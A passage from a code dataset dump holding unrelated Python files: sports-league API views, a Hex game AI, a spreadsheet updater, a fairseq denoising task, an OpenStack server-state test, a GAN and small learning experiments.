load_competition_data(competition_guid)\n\n team_results = load_team_results(team_guid)\n\n return HttpResponse(json.dumps(team_results), content_type=\"application/json\")\n\n\ndef load_team_results(team_guid):\n url = '%sTeamMatchesByGuid?teamGuid=%s' % (VBL_URL, team_guid)\n result_data = requests.get(url).json()\n return result_data\n\n\ndef load_competition_data(competition_guid):\n url = '%spouleByGuid?pouleguid=%s' % (VBL_URL, competition_guid)\n competition_data = requests.get(url).json()\n return competition_data\n\n\ndef 
find_competition_from_team(team_competitions, competition):\n for team_comp in team_competitions:\n if team_comp['naam'] == competition:\n return team_comp\n\n\ndef find_team_from_club(club_teams, team):\n for club_team in club_teams:\n if club_team['naam'] == team:\n return club_team\n\n\ndef load_team_data(team_guid):\n url = '%sTeamDetailByGuid?teamGuid=%s' % (VBL_URL, team_guid)\n team_data = requests.get(url).json()\n return team_data\n","sub_path":"vbl_messenger/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"525398819","text":"import numpy as np\n\nimport TerminatorHex\nimport MCTSHex\nfrom Hex import *\n\nif __name__ == '__main__':\n enable_GUI = True\n enable_interactive_text = True\n board_size = 5\n n_players = 0\n ai_color = HexBoard.RED\n terminator_AI = TerminatorHex.TerminatorHex(3, True, random_seed='random', do_transposition=True, do_iterative_deepening=True)\n mcts_AI = MCTSHex.MCTSHex(500, 10, expansion_function=('constant', 1), enh_WinScan=True, enh_EnsureTopLevelExplr=True)\n board = HexUI(board_size, n_players=n_players, enable_gui=enable_GUI, interactive_text=enable_interactive_text,\n ai_move=terminator_AI.terminator_move, ai_color=ai_color,\n blue_ai_move=terminator_AI.terminator_move, red_ai_move=mcts_AI.MCTS_move,\n move_list=[])\n\n if not enable_GUI and not enable_interactive_text:\n\n # sanity check that wins are detected\n for i in range(0, 2):\n winner = HexBoard.RED if i == 0 else HexBoard.BLUE\n loser = HexBoard.BLUE if i == 0 else HexBoard.RED\n board = HexBoard(3)\n board.place_with_color((1, 1), loser)\n board.place_with_color((2, 1), loser)\n board.place_with_color((1, 2), loser)\n board.place_with_color((2, 2), loser)\n board.place_with_color((0, 0), winner)\n board.place_with_color((1, 0), winner)\n board.place_with_color((2, 0), winner)\n board.place_with_color((0, 1), winner)\n board.place_with_color((0, 2), winner)\n assert (board.check_win(winner) == True)\n assert (board.check_win(loser) == False)\n board.print_board()\n endable_board = HexBoard(4)\n # sanity check that random play will at some point end the game\n while not endable_board.game_over:\n endable_board.place_with_color((np.random.randint(0, 4), np.random.randint(0, 4)), HexBoard.RED)\n assert (endable_board.game_over == True)\n assert (endable_board.check_win(HexBoard.RED) == True)\n assert (endable_board.check_win(HexBoard.BLUE) == False)\n print(\"Randomly filled board\")\n endable_board.print_board()\n\n neighbor_check = HexBoard(5)\n assert (neighbor_check.get_neighbors((0, 0)) == [(1, 0), (0, 1)])\n assert (neighbor_check.get_neighbors((0, 1)) == [(1, 1), (1, 0), (0, 2), (0, 0)])\n assert (neighbor_check.get_neighbors((1, 1)) == [(0, 1), (2, 1), (0, 2), (2, 0), (1, 2), (1, 0)])\n assert (neighbor_check.get_neighbors((3, 4)) == [(2, 4), (4, 4), (4, 3), (3, 3)])\n assert (neighbor_check.get_neighbors((4, 3)) == [(3, 3), (3, 4), (4, 4), (4, 2)])\n assert (neighbor_check.get_neighbors((4, 4)) == [(3, 4), (4, 3)])\n neighbor_check_11 = HexBoard(5)\n assert (neighbor_check_11.get_neighbors((4, 4)) == [(3, 4), (4, 3)])\n\n neighbor_check_small = HexBoard(2)\n assert (neighbor_check_small.get_neighbors((0, 0)) == [(1, 0), (0, 1)])\n assert (neighbor_check_small.get_neighbors((1, 0)) == [(0, 0), (0, 1), (1, 1)])\n assert (neighbor_check_small.get_neighbors((0, 1)) == [(1, 1), (1, 0), (0, 0)])\n assert (neighbor_check_small.get_neighbors((1, 1)) == [(0, 1), 
(1, 0)])\n\n neighbor_check_sanity = HexBoard(11)\n for x in range(0, 11):\n for y in range(0, 11):\n neighbors = neighbor_check_sanity.get_neighbors((x, y))\n for neighbor in neighbors:\n neighbors_neighbors = neighbor_check_sanity.get_neighbors(neighbor)\n index_of_self = neighbors_neighbors.index((x, y))\n assert (index_of_self != -1)\n\n# main() # replaced by __name__ == '__main__'\n","sub_path":"A4/HexGame.py","file_name":"HexGame.py","file_ext":"py","file_size_in_byte":3739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"493137542","text":"#!python3\n'''\n updateProduce.py - corrige os preços em uma planilha de venda de produtos\n'''\nimport openpyxl\n\nwb = openpyxl.load_workbook('produceSales.xlsx')\nsheet = wb['Sheet']\nPRICE_UPDATES = {'Garlic': 4.01, 'Celery': 2.19, 'Lemon': 0.99}\n# Percorre todas as linhas em um loop e atualiza os preços\nfor rowNum in range(2, len(sheet['A'])):\n produceName = sheet.cell(row=rowNum, column=1).value\n if produceName in PRICE_UPDATES:\n sheet.cell(row=rowNum, column=2).value = PRICE_UPDATES[produceName]\n\nwb.save('updatedSales.xlsx')\n","sub_path":"updateProduce_v2.py","file_name":"updateProduce_v2.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"569196485","text":"# Copyright (c) Facebook, Inc. and its affiliates.\r\n#\r\n# This source code is licensed under the MIT license found in the\r\n# LICENSE file in the root directory of this source tree.\r\n\r\nimport logging\r\nimport os\r\n\r\nimport numpy as np\r\nfrom fairseq.data import (\r\n AppendTokenDataset,\r\n ConcatDataset,\r\n DenoisingDataset,\r\n Dictionary,\r\n PrependTokenDataset,\r\n ResamplingDataset,\r\n SortDataset,\r\n TokenBlockDataset,\r\n data_utils,\r\n)\r\nfrom fairseq.data.encoders.utils import get_whole_word_mask\r\nfrom fairseq.tasks import register_task\r\n\r\nfrom .denoising import DenoisingTask\r\n\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\n\r\n@register_task(\"multilingual_denoising\")\r\nclass MultilingualDenoisingTask(DenoisingTask):\r\n @staticmethod\r\n def add_args(parser):\r\n DenoisingTask.add_args(parser)\r\n parser.add_argument(\r\n \"--multilang-sampling-alpha\",\r\n type=float,\r\n default=1.0,\r\n help=\"smoothing alpha for sample ratios across multiple datasets\",\r\n )\r\n parser.add_argument(\"--add-lang-token\", default=False, action=\"store_true\")\r\n parser.add_argument(\r\n \"--langs\", type=str, help=\"language ids we are considering\", default=None\r\n )\r\n parser.add_argument(\r\n \"--no-whole-word-mask-langs\",\r\n type=str,\r\n default=\"\",\r\n metavar=\"N\",\r\n help=\"languages without spacing between words dont support whole word masking\",\r\n )\r\n\r\n @classmethod\r\n def setup_task(cls, args, **kwargs):\r\n \"\"\"Setup the task.\"\"\"\r\n paths = args.data.split(\":\")\r\n assert len(paths) > 0\r\n dictionary = Dictionary.load(os.path.join(paths[0], \"dict.txt\"))\r\n\r\n data_path = paths[0]\r\n if args.langs is None:\r\n languages = sorted(\r\n [\r\n name\r\n for name in os.listdir(data_path)\r\n if os.path.isdir(os.path.join(data_path, name))\r\n ]\r\n )\r\n else:\r\n languages = args.langs.split(\",\")\r\n\r\n if args.add_lang_token:\r\n for lang in languages:\r\n dictionary.add_symbol(\"[{}]\".format(lang))\r\n\r\n logger.info(\"dictionary: {} types\".format(len(dictionary)))\r\n if not hasattr(args, \"shuffle_instance\"):\r\n args.shuffle_instance = False\r\n return 
cls(args, dictionary)\r\n\r\n def __init__(self, args, dictionary):\r\n super().__init__(args, dictionary)\r\n self.dictionary = dictionary\r\n self.seed = args.seed\r\n\r\n # add mask token\r\n self.mask_idx = self.dictionary.add_symbol(\"\")\r\n self.langs = args.langs\r\n self.args = args\r\n\r\n def _get_sample_prob(self, dataset_lens):\r\n \"\"\"\r\n Get smoothed sampling porbability by languages. This helps low resource\r\n languages by upsampling them.\r\n \"\"\"\r\n prob = dataset_lens / dataset_lens.sum()\r\n smoothed_prob = prob ** self.args.multilang_sampling_alpha\r\n smoothed_prob = smoothed_prob / smoothed_prob.sum()\r\n return smoothed_prob\r\n\r\n def load_dataset(self, split, epoch=1, combine=False, **kwargs):\r\n \"\"\"Load a given dataset split.\r\n\r\n Args:\r\n split (str): name of the split (e.g., train, valid, test)\r\n \"\"\"\r\n paths = self.args.data.split(\":\")\r\n assert len(paths) > 0\r\n data_path = paths[(epoch - 1) % len(paths)]\r\n split_path = os.path.join(data_path, split)\r\n\r\n if self.langs is None:\r\n languages = sorted(\r\n [\r\n name\r\n for name in os.listdir(data_path)\r\n if os.path.isdir(os.path.join(data_path, name))\r\n ]\r\n )\r\n else:\r\n languages = self.langs.split(\",\")\r\n for name in languages:\r\n p = os.path.join(data_path, name)\r\n assert os.path.exists(p), \"data not found: {}\".format(p)\r\n\r\n logger.info(\"Training on {0} languages: {1}\".format(len(languages), languages))\r\n logger.info(\r\n \"Language to id mapping: \", {lang: id for id, lang in enumerate(languages)}\r\n )\r\n\r\n mask_whole_words = get_whole_word_mask(self.args, self.dictionary)\r\n language_without_segmentations = self.args.no_whole_word_mask_langs.split(\",\")\r\n lang_datasets = []\r\n for language in languages:\r\n split_path = os.path.join(data_path, language, split)\r\n\r\n dataset = data_utils.load_indexed_dataset(\r\n split_path,\r\n self.source_dictionary,\r\n self.args.dataset_impl,\r\n combine=combine,\r\n )\r\n if dataset is None:\r\n raise FileNotFoundError(\r\n \"Dataset not found: {} ({})\".format(split, split_path)\r\n )\r\n\r\n end_token = (\r\n self.source_dictionary.index(\"[{}]\".format(language))\r\n if self.args.add_lang_token\r\n else self.source_dictionary.eos()\r\n )\r\n\r\n # create continuous blocks of tokens\r\n dataset = TokenBlockDataset(\r\n dataset,\r\n dataset.sizes,\r\n self.args.tokens_per_sample - 2, # one less for \r\n pad=self.source_dictionary.pad(),\r\n eos=end_token,\r\n break_mode=self.args.sample_break_mode,\r\n )\r\n logger.info(\"loaded {} blocks from: {}\".format(len(dataset), split_path))\r\n\r\n # prepend beginning-of-sentence token (, equiv. 
to [CLS] in BERT)\r\n dataset = PrependTokenDataset(dataset, self.source_dictionary.bos())\r\n dataset = AppendTokenDataset(dataset, end_token)\r\n\r\n lang_mask_whole_words = (\r\n mask_whole_words\r\n if language not in language_without_segmentations\r\n else None\r\n )\r\n lang_dataset = DenoisingDataset(\r\n dataset,\r\n dataset.sizes,\r\n self.dictionary,\r\n self.mask_idx,\r\n lang_mask_whole_words,\r\n shuffle=self.args.shuffle_instance,\r\n seed=self.seed,\r\n args=self.args,\r\n eos=None\r\n if not self.args.add_lang_token\r\n else self.source_dictionary.index(\"[{}]\".format(language)),\r\n )\r\n lang_datasets.append(lang_dataset)\r\n\r\n dataset_lengths = np.array(\r\n [len(d) for d in lang_datasets],\r\n dtype=float,\r\n )\r\n logger.info(\r\n \"loaded total {} blocks for all languages\".format(\r\n int(dataset_lengths.sum()),\r\n )\r\n )\r\n if split == self.args.train_subset:\r\n # For train subset, additionally up or down sample languages.\r\n sample_probs = self._get_sample_prob(dataset_lengths)\r\n logger.info(\r\n \"Sample probability by language: {}\".format(\r\n {\r\n lang: \"{0:.4f}\".format(sample_probs[id])\r\n for id, lang in enumerate(languages)\r\n }\r\n )\r\n )\r\n size_ratio = (sample_probs * dataset_lengths.sum()) / dataset_lengths\r\n logger.info(\r\n \"Up/Down Sampling ratio by language: {}\".format(\r\n {\r\n lang: \"{0:.2f}\".format(size_ratio[id])\r\n for id, lang in enumerate(languages)\r\n }\r\n )\r\n )\r\n\r\n resampled_lang_datasets = [\r\n ResamplingDataset(\r\n lang_datasets[i],\r\n size_ratio=size_ratio[i],\r\n seed=self.args.seed,\r\n epoch=epoch,\r\n replace=size_ratio[i] >= 1.0,\r\n )\r\n for i, d in enumerate(lang_datasets)\r\n ]\r\n dataset = ConcatDataset(\r\n resampled_lang_datasets,\r\n )\r\n else:\r\n dataset = ConcatDataset(lang_datasets)\r\n lang_splits = [split]\r\n for lang_id, lang_dataset in enumerate(lang_datasets):\r\n split_name = split + \"_\" + languages[lang_id]\r\n lang_splits.append(split_name)\r\n self.datasets[split_name] = lang_dataset\r\n\r\n if split in self.args.valid_subset:\r\n self.args.valid_subset = self.args.valid_subset.replace(\r\n split, \",\".join(lang_splits)\r\n )\r\n\r\n with data_utils.numpy_seed(self.args.seed + epoch):\r\n shuffle = np.random.permutation(len(dataset))\r\n\r\n self.datasets[split] = SortDataset(\r\n dataset,\r\n sort_order=[\r\n shuffle,\r\n dataset.sizes,\r\n ],\r\n )\r\n","sub_path":"edgelm/fairseq/tasks/multilingual_denoising.py","file_name":"multilingual_denoising.py","file_ext":"py","file_size_in_byte":9012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"27370520","text":"import sentiment_analysis\r\nimport re\r\n\r\n\r\ndef file_extension(tweet_file, keyword_file): # checks whether a file extension is given using regular expressions\r\n file_ext = re.compile(r\".txt\") # This is the variable which will search for the .txt extension\r\n\r\n tweet_extension = file_ext.findall(tweet_file) # Searches for the .txt extension on this file\r\n keyword_extension = file_ext.findall(keyword_file) # Searches for the .txt extension\r\n\r\n if len(tweet_extension) == 0 and len(keyword_extension) == 0: # If their is no extension on either file\r\n return tweet_file + \".txt\", keyword_file + \".txt\" # Return the files with the extensions\r\n elif len(tweet_extension) >= 1 and len(keyword_extension) == 0: # If their is no extension on the keyword file\r\n return tweet_file, keyword_file + \".txt\" # Returns the keyword file with an extension 
and the tweet the same\r\n elif len(tweet_extension) == 0 and len(keyword_extension) >= 1: # If their is no extension on the tweet file\r\n return tweet_file + \".txt\", keyword_file # Returns the tweet file with an extension and the keyword the same\r\n elif len(tweet_extension) >= 1 and len(keyword_extension) >= 1: # If there are extensions on both files\r\n return tweet_file, keyword_file # Returns both files the same\r\n\r\n\r\ndef main():\r\n tweet_file_name = str(input(\"Please submit the file with the tweets: \")) # Get's the file with the tweets\r\n keyword_file_name = str(input(\"Please submit the file with the keywords: \")) # Get's the file with the keywords\r\n\r\n files = file_extension(tweet_file_name, keyword_file_name) # Checks the extensions on the file names\r\n\r\n sentiments = sentiment_analysis.compute_tweets(files[0], files[1])\r\n print(\"Eastern tweet results: Average: \" + str(sentiments[0][0]) + \", number of keyword tweets: \" +\r\n str(sentiments[0][1]) + \", number of tweets in region: \" + str(sentiments[0][2])) # Prints the value compute tweets returns\r\n\r\n print(\"Central tweet results: Average: \" + str(sentiments[1][0]) + \", number of keyword tweets: \" +\r\n str(sentiments[1][1]) + \", number of tweets in region: \" + str(\r\n sentiments[1][2])) # Prints the value compute tweets returns\r\n\r\n print(\"Mountain tweet results: Average: \" + str(sentiments[2][0]) + \", number of keyword tweets: \" +\r\n str(sentiments[2][1]) + \", number of tweets in region: \" + str(\r\n sentiments[2][2])) # Prints the value compute tweets returns\r\n\r\n print(\"Pacific tweet results: Average: \" + str(sentiments[3][0]) + \", number of keyword tweets: \" +\r\n str(sentiments[3][1]) + \", number of tweets in region: \" + str(\r\n sentiments[3][2])) # Prints the value compute tweets returns\r\n\r\n\r\nmain()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"282814357","text":"from tempest import openstack\nimport unittest2 as unittest\nfrom nose.plugins.attrib import attr\nimport os\nimport subprocess\nfrom paramiko import SSHClient\nfrom paramiko import AutoAddPolicy\nimport tempest.config\nfrom tempest.common.utils.data_utils import rand_name\nfrom tempest import exceptions\nimport re\n\n\nclass VMstateTest(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.os = openstack.Manager()\n cls.client = cls.os.servers_client\n cls.config = cls.os.config\n cls.image_ref = cls.config.compute.image_ref\n cls.flavor_ref = cls.config.compute.flavor_ref \n cls.login_name = cls.config.compute.login_name\n cls.pswd = cls.config.compute.pswd\n \n def setUp(self):\n self.name = rand_name('server')\n resp, server = self.client.create_server(self.name,\n self.image_ref,\n self.flavor_ref)\n self.server_id = server['id'] \n self.client.wait_for_server_status(self.server_id, 'ACTIVE')\n \n def tearDown(self):\n self.client.delete_server(self.server_id)\n \n @attr(type='positive')\n def test_suspend_resume_server(self): \n \"\"\"The server should have ACTIVE status after the suspend-resume procedure\"\"\" \n self.client.suspend(self.server_id)\n self.client.wait_for_server_status(self.server_id, 'SUSPENDED')\n self.client.resume(self.server_id)\n self.client.wait_for_server_status(self.server_id, 'ACTIVE')\n resp, body=self.client.get_server(self.server_id) \n self.assertEqual(\"ACTIVE\",body['status'])\n \n @attr(type='positive') \n 
def test_ping_server(self):\n \"\"\"The sever should ping the Internet and other servers from the same subnet\"\"\" \n resp, body=self.client.get_server(self.server_id) \n # Find IP of server\n try:\n (_, network) = body['addresses'].popitem()\n ip = network[0]['addr']\n except KeyError:\n self.fail(\"Failed to retrieve IP address from server entity\")\n \n params = {'status': 'active'}\n data,sbody=self.client.list_servers_with_detail(params) \n servers=[] \n \n # Get the list of active servers from the same subnet\n for i in sbody['servers']: \n (_, network) = i['addresses'].popitem()\n iip = network[0]['addr']\n servers.append(iip) \n \n # regexp\n exp=re.compile(r\"0% packet loss\") \n \n #ssh into server \n ssh=SSHClient()\n ssh.set_missing_host_key_policy(AutoAddPolicy())\n ssh.connect(ip,username=self.login_name,password=self.pswd)\n # Try to ping the internet\n stdin, stdout, stderr=ssh.exec_command(\"ping -c2 8.8.8.8\")\n # Read the output\n bufferdata = stdout.read() \n # Check if internet is available\n if exp.search(bufferdata):\n isping=\"0% packet loss\"\n self.assertEqual(\"0% packet loss\", isping)\n ping = \"\" \n for j in servers: \n stdin, stdout, stderr=ssh.exec_command(\"ping -c2 \"+j) \n buffer = stdout.read()\n if exp.search(buffer):\n ping=\"0% packet loss\"\n self.assertEqual(\"0% packet loss\", ping, \"The severs with ip \"+j+\" is unavailable\")\n \n \n \n \n\n\n\n \n \n \n \n \n \n \n \n ","sub_path":"tempest/tests/compute/test_server_state.py","file_name":"test_server_state.py","file_ext":"py","file_size_in_byte":3588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"362942789","text":"class Node:\n\tdef __init__(self):\n\t\tself.data=None\n\t\tself.pointer=None \n\nclass queue:\n\tdef __init__(self):\n\t\tself.n=0\n\t\tself.head=None\n\t\tself.tail=None\n\n\tdef enqueue(self,x):\n\t\ttemp=Node()\n\t\ttemp.data=x\n\t\tif self.n==0:\n\t\t\tself.head=temp\n\t\t\tself.tail=temp\n\t\t\tself.n+=1\n\t\telse:\n\t\t\tself.tail.pointer=temp\n\t\t\tself.tail=temp\n\t\t\tself.n+=1\n\n\tdef dequeue(self):\n\t\tif self.n==0:\n\t\t\traise ValueError(\"Queue is empty\")\n\t\t\treturn\n\t\t\n\t\telement=self.head.data\n\t\tself.head=self.head.pointer\n\t\tself.n=self.n-1\n\t\treturn element\n\n\n\tdef isempty(self):\n\t\tif self.n==0:\n\t\t\treturn 1\n\t\telse :\n\t\t\treturn 0\t\n\n\tdef qprint(self):\n\t\ttrav=self.head\n\t\twhile trav!=None:\n\t\t\treturn(trav.data)\n\t\t\ttrav=trav.pointer\n\n\tdef mnode(self,m):\n\t\tc=0\n\t\ttrav=self.head\n\t\tif m {np.sum(np.multiply(self.outs, ideal)) / size}\")\n\n def weights_correction(self, data_size, training_rate):\n self.weights -= self.corrections / data_size * training_rate\n\n\nDATA = [\n ([0, 0], [0, ]),\n ([0, 1], [1, ]),\n ([1, 0], [1, ]),\n ([1, 1], [0, ])\n ]\n\nweb = Web([2, 3, 2], 0.75)\n\n","sub_path":"neural_network_v3.py","file_name":"neural_network_v3.py","file_ext":"py","file_size_in_byte":3637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"279700236","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 24 15:29:57 2018\n\n@author: Luc Deike\n\"\"\"\n\nimport pims\nimport matplotlib.pyplot as plt\nimport comps\n\nfolder = comps.cf('comp3c')+'180522\\\\'\nc = pims.open(folder+'nozzle_zoomIn_ingestedBubbles.cine')\n\ndx = 1.6438267326E-05\n\nf = 117\n\nfig = plt.figure(figsize=(14,7))\nax = fig.add_subplot(111)\nax.imshow(c[f],vmin=0,vmax=500,cmap='gray')\nax.set_axis_off()\n\n'''\nscale 
bar\n'''\n\nax.plot([1500,1500+0.01/dx],[1500,1500],'-',color='r',lw=3)\nax.text(1800,1600,'1 cm',color='r',fontsize=16)\n\nfig.tight_layout()\nfig.savefig(folder+'bubble_ingestion_example.pdf')","sub_path":"scripts/OLD/bubble_pump_ingestion_figure.py","file_name":"bubble_pump_ingestion_figure.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"613625282","text":"import tensorflow as tf\nimport numpy\nimport sparse_conv_gen as sparse\nimport datasets\n\nimport network as net\n\nd_0 = 100\n\nlearning_rate = 2.0\n\nFROM_SAVE = False\n\nnormalize_G = False\nnormalize_D = False\n\nepochs = 10000\n\nn = 4\nm = 3\n\nbatch_size = 16\n\niterator = datasets.celeb_A().batch(batch_size).make_one_shot_iterator()\nZ, z_batch = datasets.random_normal(d_0)\nX = iterator.get_next()\n\ndef batch(batch_size):\n return {**x_batch(batch_size), **z_batch(batch_size)}\n\n\n\nnon_lin_G = net.shift_relu\nnon_lin_D = tf.nn.relu\n\n################# GENERATOR ##########3333\n'''\nxs = tf.lin_space(-1.5, 1.5, 28)\nxs = tf.stack([tf.tile(tf.reshape(xs, [-1, 1]), [1, 28]),\n tf.tile(tf.reshape(xs, [1, -1]), [28, 1])], 2)\nxs = tf.reshape(xs, [-1, 2])\n'''\n[Z1], theta = net.affine([Z], d_0, 500*n)\nZ1 = non_lin_G(Z1)\nif normalize_G:\n [Z1] = net.normalize([Z1])\n\n[V0], theta1 = net.affine([Z1], 500*n, 500*n)\nV0 = non_lin_G(V0)\nif normalize_G:\n [V0] = net.normalize([V0])\n\n[P0], theta2 = net.affine([Z1], 500*n, 2)\n[R0], theta3 = net.affine([Z1], 500*n, 2)\nR0 = tf.reshape(R0, [-1, 1, 2]) + [0.8, 0]\nR0 = 0.8 * R0 / (0.3 + tf.norm(R0, axis=-1, keepdims=True))\n\nscene0 = {\n \"vs\": tf.reshape(V0, [-1, 1, 500*n]),\n \"ps\": tf.reshape(P0, [-1, 1, 2])*0.3,\n \"rs\": R0\n }\n\n\ndef mod_scene(sc):\n sc['rs'] = sc['rs']*2.0\n return sc\n\n\nX0_gen, generator = sparse.sparse_net(scene0, 64, 3.0 / 64.0,\n [500*n, 400*n, 300*n, 200*n, 100*n, 50*n, 20*n], [2, 2, 2, 2, 3, 3],\n normalize_G, non_lin=non_lin_G,\n mod_scene=mod_scene)\n\nX0_gen = non_lin_G(X0_gen)\n\n#[X_gen], theta4 = net.affine([tf.reshape(X0_gen, [batch_size*64*64, -1])], 20*n, 3)\n#X_gen = tf.reshape(X_gen, [-1, 64, 64, 3])\n\n[W_last], theta_W = net.affine([Z1], 500*n, 20*n*3)\n[b_last], theta_b = net.affine([Z1], 500*n, 3)\nX_gen = tf.matmul(tf.reshape(X0_gen, [batch_size, 64*64, -1]), tf.reshape(W_last, [batch_size, -1, 3])) / tf.sqrt(20.0*n)\nX_gen = X_gen + 0.5 + 0.1 * tf.reshape(b_last, [batch_size, 1, 3])\nX_gen = tf.reshape(X_gen, [-1, 64, 64, 3])\n\nX_gen = tf.atan(tf.nn.relu(X_gen)) * 2 / numpy.pi\ntf.summary.image('generated', X_gen, max_outputs=16)\n\ngenerator = generator + theta + theta1 + theta2 + theta3 + theta_W + theta_b\n\n##################### DISCRIMINATOR #######\n\n[X1, X1_gen], vs0 = net.conv_net([X*1.5 - 0.5, X_gen * 1.5 - 0.5], [3, 104*m, 228*m, 428*m, 428*m, 400*m],\n [4, 4, 4, 3, 1], [2, 2, 2, 2, 1],\n \"D_conv\", normalize_D, non_lin_D)\n \nX1 = non_lin_D(X1)\nX1_gen = non_lin_D(X1_gen)\nif normalize_D:\n X1, X1_gen = net.normalize([X1, X1_gen], [0, 1, 2])\nX1 = tf.reshape(X1, [-1, 4*4*400*m])\nX1_gen = tf.reshape(X1_gen, [-1, 4*4*400*m])\n\n[D_real, D_gen], vs1 = net.affine([X1, X1_gen], 4*4*400*m, 1, \"D\")\n \ntf.summary.histogram(\"D_real\", D_real)\ntf.summary.histogram(\"D_gen\", D_gen)\n\n\ndiscriminator = vs0 + vs1\n\n######################### COSTS #############\n'''\nD_cost = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(None, tf.ones_like(D_real), D_real)) + \\\n 
tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(None, tf.zeros_like(D_gen), D_gen))\nG_cost = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(None, tf.ones_like(D_gen), D_gen))\n\n'''\nD_cost = tf.reduce_mean(D_real) - tf.reduce_mean(D_gen)\nG_cost = tf.reduce_mean(D_gen)\n\nD_cost += 0.5 * tf.reduce_mean(tf.square(D_real)) + 0.5 * tf.reduce_mean(tf.square(D_gen))\nG_cost += 0.5 * tf.reduce_mean(tf.square(D_real)) + 0.5 * tf.reduce_mean(tf.square(D_gen))\n\n\ntf.summary.scalar(\"D_cost\", D_cost)\ntf.summary.scalar(\"G_cost\", G_cost)\n\ntf.summary.tensor_summary(\"D_gen\", D_gen)\ntf.summary.tensor_summary(\"D_real\", D_real)\n\n\n\nopt = tf.train.GradientDescentOptimizer(learning_rate)\n\ninfo = []\nstep = []\n\ngrad_G = tf.gradients(G_cost, generator)\ngrad_D = tf.gradients(D_cost, discriminator)\n\ngrads = grad_D + grad_G\n\nstep = step + [opt.apply_gradients(zip(grads, discriminator + generator))]\nfix = net.fix_weights(generator) + net.fix_weights(discriminator)\n'''\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n x_gen = sess.run(X_gen, feed_dict=batch(2))\n\nimport matplotlib.pyplot as P\n\nP.imshow(x_gen[0, :, :, 0]);P.show()\n\n'''\nsave_dir = \"CELEB_GAN\"\n\nif FROM_SAVE==False:\n import os\n for file in os.listdir(save_dir):\n os.remove(os.path.join(save_dir, file))\n\n\nmerged = tf.summary.merge_all()\ntrain_writer = tf.summary.FileWriter(save_dir, flush_secs=5)\n\nsaver = tf.train.Saver()\n\nsess = tf.Session()\n\nif FROM_SAVE:\n saver.restore(sess, save_dir + \"/model.ckpt\")\nelse:\n sess.run(tf.global_variables_initializer())\n\n\ntry:\n const_dict = z_batch(batch_size)\n \n for t in range(epochs):\n for _ in range(1):\n _, cost = sess.run([step, D_cost], feed_dict=z_batch(batch_size))\n #sess.run(fix)\n print(cost)\n\n if t % 5 == 0:\n print(\"SAVE IMAGE\")\n summary, x_gen, d_gen, d_real = sess.run([merged, X_gen, D_real, D_gen], feed_dict=const_dict)\n \n train_writer.add_summary(summary, t)\n train_writer.flush()\n \n\nfinally:\n print(\"closing\")\n saver.save(sess, save_dir + '/model.ckpt')\n sess.close()\n train_writer.close()\n\n# tensorboard --logdir=CELEB_GAN --reload_interval=4\n\n\n","sub_path":"sparse_GAN_celeb.py","file_name":"sparse_GAN_celeb.py","file_ext":"py","file_size_in_byte":5355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"403719668","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n\n \ndef fab(num):\n '''\n 斐波那契额数列,兔子问题\n '''\n list = []\n a,b = 1,0\n for i in range(num):\n b,a = a,a+b\n list.append(b)\n \n print(list)\n\nif __name__ == \"__main__\":\n fab(8)","sub_path":"Python_basic/4.fab.py","file_name":"4.fab.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"133205130","text":"from __future__ import print_function\nimport tensorflow.keras as keras\nfrom tensorflow.keras.datasets import mnist\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Dropout, Flatten\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D\nfrom tensorflow.keras import backend as K\nimport datetime\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport matplotlib.lines as mlines\nimport tensorflow as tf\nimport utils\nimport semantic_drift\n\n# Fully federated, one-to-one model from the initial model\n\n# Hyperparameters\nbatch_size = 50\nepochs = 20\n\n# input image dimensions\nimg_rows, 
img_cols = 28, 28\n\n\ndef custom_model(input_shape, num_classes):\n model = Sequential()\n model.add(Flatten(input_shape=input_shape))\n model.add(Dense(200, activation='relu'))\n model.add(Dense(200, activation='relu'))\n model.add(Dense(num_classes, activation='softmax'))\n return model\n\ndef compile_model(model): \n # initiate SGD optimizer\n opt = keras.optimizers.SGD(lr=0.1)\n model.compile(loss='mean_squared_error', optimizer=opt, metrics=['accuracy'])\n \ndef fit_model_with_datasets(model, epochs, x_train, y_train):\n now = datetime.datetime.now()\n# print (\"Training date and time : \")\n# print (now.strftime(\"%Y-%m-%d %H:%M:%S\"))\n res = model.fit(x_train, y_train,\n batch_size=batch_size,\n epochs=epochs,\n shuffle=True,\n verbose=0)\n# print (\"Elasped Time: \" + str(datetime.datetime.now() - now))\n return res\n\ndef model_combs(model_list):\n combs = list()\n l = len(model_list)\n for i in range(l):\n for j in range(l):\n if i > j:\n combs.append([model_list[i], model_list[j]])\n return combs\n\ndef run(seed):\n print(\"seed {}\".format(seed))\n \n log_dir = \"logs/fit/\" + datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\")\n tensorboard_callback = 